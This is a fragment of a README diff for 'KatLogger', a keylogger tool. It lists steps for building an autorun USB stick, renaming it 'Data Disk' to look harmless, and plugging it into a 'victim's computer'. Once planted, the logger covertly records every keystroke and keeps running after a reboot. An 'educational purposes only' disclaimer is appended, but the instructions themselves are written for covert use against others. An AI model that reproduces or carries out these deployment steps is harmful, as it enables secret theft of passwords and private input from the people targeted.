Lif28/KatLogger/README.md

 > - Open Usb AutoRun Creator and select the file .exe to be flashed
 > - For the icon select the .ico file, downloaded before
 > - Click Create
+> - Rename the usb stick to "Data Disk"
 > - That's all
 > - Plug the usb in your victim's computer and enjoy =]

 KatLogger will capture every single key hit by the victim (when the usb is plugged in).
+Obviously when the computer is restarted or turned off and than turned on, KatLogger will run as normal!

 # DISCLAIMER
 ### KatLogger is for educational purposes only.
 The authors take NO responsibility and liability for how you use any of the tools/source code/any files provided.
 The authors and anyone affiliated with will not be liable for any losses and/or damages in connection with use of ANY files provided with KatLogger.
 DO NOT use KatLogger if you don't have the permission to do that,